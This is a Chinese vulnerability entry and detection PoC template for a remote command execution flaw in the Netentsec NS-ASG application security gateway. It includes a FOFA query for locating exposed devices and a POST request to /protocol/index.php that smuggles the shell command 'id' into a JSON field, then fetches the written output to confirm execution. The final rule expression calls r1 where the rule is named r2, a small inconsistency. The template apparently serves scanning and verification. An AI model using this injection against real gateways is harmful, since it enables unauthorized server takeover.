漏洞描述
网康 NS-ASG安全网关 index.php文件存在远程命令执行漏洞,攻击者通过构造特殊的请求包可以获取服务器权限
fofa:title=="网康 NS-ASG 应用安全网关"
netentsec-ns-asg-index-php-rce: 网康NS-ASG安全网关index.php远程命令执行漏洞
PoC代码[已公开]
id: netentsec-ns-asg-index-php-rce
info:
name: 网康NS-ASG安全网关index.php远程命令执行漏洞
author: avic123
severity: critical
verified: true
description: |
网康 NS-ASG安全网关 index.php文件存在远程命令执行漏洞,攻击者通过构造特殊的请求包可以获取服务器权限
fofa:title=="网康 NS-ASG 应用安全网关"
reference:
- https://github.com/Threekiii/Vulnerability-Wiki/blob/master/docs-base/docs/iot/%E7%BD%91%E5%BA%B7-NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3-index.php-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
tags: netentsec,rce
created: 2025/03/18
set:
randstr: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /protocol/index.php
body: |
jsoncontent={"protocolType":"getsysdatetime","messagecontent":"1;id>{{randstr}}.txt;"}
expression: >-
response.status == 200
r2:
request:
method: GET
path: /protocol/{{randstr}}.txt
expression: >-
response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.raw)
expression: r0() && r1()